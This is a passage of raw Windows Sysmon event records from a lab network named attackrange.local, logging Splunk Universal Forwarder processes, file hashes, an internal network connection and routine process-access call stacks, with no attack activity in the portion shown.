Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.382{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACD41027F6DDC9A12EB8891E416445F9,SHA256=A6DC4B9A047A954D5BEEA7387610B89D2672AB5519FC9D07FE3FA3BD6575152C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:16.561{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61996-false10.0.1.12-8000- 23542300x80000000000000001055274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:25.068{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C9D4A8DCF4497CDF3F0A66B173D4B17,SHA256=5173917E522466C873E8D6B4773E1E70ED5080A853339B15F710762F804B6480,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.304{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54F3F15B693D4B9158FA0E1C869D1A07,SHA256=4214CA253B511B055CA81F0C908E35D98E9BA13A1C40E955A892B381B95B995D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.304{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=239D8D471657A283813C3FB6BB80206A,SHA256=D5636E46A29A0289DEEEB060981A745ED95893E99BA0607585CB6FF87658C8F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.179{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B5-60EB-EB79-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.179{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.179{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:25.164{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8B5-60EB-EB79-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B5-60EB-EB79-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-F8B5-60EB-EB79-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.851{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54F3F15B693D4B9158FA0E1C869D1A07,SHA256=4214CA253B511B055CA81F0C908E35D98E9BA13A1C40E955A892B381B95B995D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B6-60EB-ED79-00000000D001}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
